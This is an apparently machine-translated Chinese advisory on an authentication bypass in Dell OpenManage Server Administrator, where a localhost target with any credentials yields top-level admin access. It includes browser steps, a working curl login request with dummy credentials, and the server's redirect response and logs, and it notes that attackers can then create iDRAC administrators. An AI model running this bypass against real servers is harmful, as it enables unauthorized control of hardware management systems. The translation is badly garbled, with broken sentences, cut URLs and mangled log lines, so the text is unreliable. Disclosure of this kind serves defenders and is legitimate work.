OpenManage服务器管理员We服务器远程启动组件安装到DellEMC设备并启动托管系统登录特征(默认为s9.5.0)时,非认证远程攻击者可登录OMSA管理员身份,而不知道系统上正确的OS用户名和密码
托管系统登录功能启动后OMSA网络服务器显示托管系统登录页在此例中, web服务器可用连接远程节点/系统取远程节点IP/主机名用户名和密码并发HTTPSWS管理程序连接远程节点远程启动组件
远程节点IP/主机名设置为localhost时,WS-管理连接WS服务器运行时同一主机远程增强组件发现用户名和密码都有效
概念证明
执行验证旁路时攻击者执行下列操作:
- web浏览器获取 https/
1311
- 切换管理系统登录页
- 主机名/IP地址域使用本地主机
- 指定用户名域中的任何用户名
- 指定密码字段中的任何密码(即BBB)
- 检查“Ignore证书警告”复选框
- 点击提交按钮
CURL命令显示成功登录OMSA并不知道正确的用户名和密码,因为响应为HTTP重定向OMSATT
curl -ki -d 'manuallogin=true&targetmachine=localhost&user=AAAA&password=BBBB&application=omsa&ignorecertificate=1' 'https://
:1311/LoginServlet?flag=true&managedws=false' HTTP/1.1 302 Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1!mode=block Set-Cookie: JSESSIONID=E765A274F3CAD6740E2604D5C9276D17;Path=/4A6A8DFC482BD64D;secure!HttpOnly Location: /4A6A8DFC482BD64D/OMSAStart?mode=omsa&vid=4A6A8DFC482BD64D vary: accept-encoding Content-Length: 0
日志显示更多成功认证旁登录细节
[39]2020-11-17 22:21:48.463 loginUser.OMAHttpServlet, sUserName=AAAA [39]2020-11-17 22:21:48.463 CharConverter, added charset while getting bytestream UTF-8 [39]2020-11-17 22:21:48.463 CharConverter, added charset while getting bytestream UTF-8 [39]2020-11-17 22:21:48.463 CharConverter, added charset while getting bytestream UTF-8 [39]2020-11-17 22:21:48.479 value of on mean AD auth, slocalLogin=null [39]2020-11-17 22:21:48.479 true for login via login page, sManualLogin=true [39]2020-11-17 22:21:48.479 HttpServlet: login user:value of ignorecertificate=true [39]2020-11-17 22:21:48.479 HttpServlet: login user:value of hostname=localhost [39]2020-11-17 22:21:48.495 HttpServlet: login user: Port is not passed - IPV4 Taking default [39]2020-11-17 22:21:48.495 HttpServlet: EnableDWS pref setting is===true [39]2020-11-17 22:21:48.495 OMAWPUtil.generateVID:0643A39C06A46299 [39]2020-11-17 22:21:48.495 OMAWPUtil.currentVID:0643A39C06A46299 [39]2020-11-17 22:21:48.557 sXML of getwsmanclient:
0
0
二百
http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
esendCdtoDA-目标机:null [3920620-111722:2186.620OMAWPETU.sendCdtoDA-用户名:Null [392020-11
0
0
0
二百
0
262151
AAA
0
[...][3920-11-1722:21:49.354OMAHtpServlet.logUser:AAA7:4
引擎盖下传客户命令登录远程节点远程节点IP/主机名设置为localhost,gewsman客户端命令发送到本地主机并成功使用(WSManstatus=0)甚至无效用户名和密码
后发单用户权限命令获取用户权限命令也成功(WSManstatus=0),账号用户权限7最高
登录后不知道正确的用户名和密码,攻击者可执行OSSA设计的所有操作举例说,s/he可添加Dell服务器综合远程存取控制器管理用户攻击者可登录iDRAC并拥有行政特权